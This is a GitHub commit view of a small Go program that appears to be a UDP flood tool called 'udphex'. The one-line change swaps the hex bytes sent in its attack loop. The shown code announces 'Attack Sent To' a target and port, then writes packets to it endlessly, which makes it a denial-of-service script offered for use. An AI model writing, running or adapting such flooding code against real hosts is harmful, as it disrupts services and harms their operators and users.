Change the shit hex message

This commit is contained in:
Fijxu 2021-04-29 23:02:00 -04:00 committed by GitHub
parent d4f862d1a4
commit 8547771775
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -15,7 +15,7 @@ func main() {
} else {
fmt.Println("Attack Sent To " + target + " Using Port " + port + " With udphex!")
for {
conn.Write([]byte("\x64\x72\x61\x63\x6f\x73\x75\x64\x70\x68\x65\x78"))
conn.Write([]byte("\x61\x73\x64"))
}
}
}